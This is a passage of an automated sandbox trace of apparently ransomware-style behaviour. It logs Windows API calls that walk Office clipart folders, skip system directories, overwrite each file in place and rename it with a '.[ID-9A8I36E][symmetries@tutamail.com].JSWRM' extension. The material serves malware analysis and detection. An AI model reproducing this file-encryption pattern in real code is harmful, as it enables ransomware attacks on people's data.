CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00116_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0074.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.372] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4870) returned 1 [0074.372] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1300) returned 0x24c1d0 [0074.372] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1300, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1300, lpOverlapped=0x0) returned 1 [0074.373] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.373] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1300, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1300, lpOverlapped=0x0) returned 1 [0074.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.373] CloseHandle (hObject=0x460) returned 1 [0074.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0074.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0074.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0074.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0074.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0074.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0074.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.374] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6906, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD00141_.WMF", cAlternateFileName="")) returned 1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2=".") returned 1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="..") returned 1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="...") returned 1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="windows") returned -1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="recovery") returned -1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="perflogs") returned -1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="documents and settings") returned -1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="system volume information") returned -1 [0074.375] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="msocache") returned -1 [0074.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0074.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00141_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00141_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00141_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0074.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0074.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00141_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00141_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00141_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0074.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.376] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26886) returned 1 [0074.376] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6900) returned 0x24c1d0 [0074.376] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x6900, lpOverlapped=0x0) returned 1 [0074.379] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.379] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x6900, lpOverlapped=0x0) returned 1 [0074.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.379] CloseHandle (hObject=0x460) returned 1 [0074.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0074.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0074.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0074.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0074.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.380] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.390] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7114, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD00146_.WMF", cAlternateFileName="")) returned 1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2=".") returned 1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="..") returned 1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="...") returned 1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="windows") returned -1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="recovery") returned -1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="perflogs") returned -1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="documents and settings") returned -1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="system volume information") returned -1 [0074.390] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="msocache") returned -1 [0074.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0074.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00146_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00146_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00146_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0074.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0074.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00146_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00146_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00146_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0074.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.436] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28948) returned 1 [0074.436] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7110) returned 0x24c1d0 [0074.436] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x7110, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x7110, lpOverlapped=0x0) returned 1 [0074.442] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.442] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x7110, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x7110, lpOverlapped=0x0) returned 1 [0074.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.442] CloseHandle (hObject=0x460) returned 1 [0074.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0074.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0074.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0074.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0074.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.444] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD00155_.WMF", cAlternateFileName="")) returned 1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2=".") returned 1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="..") returned 1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="...") returned 1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="windows") returned -1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="recovery") returned -1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="perflogs") returned -1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="documents and settings") returned -1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="system volume information") returned -1 [0074.444] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="msocache") returned -1 [0074.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00155_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00155_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00155_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0074.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00155_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00155_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00155_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0074.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.445] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11636) returned 1 [0074.445] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0074.445] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, 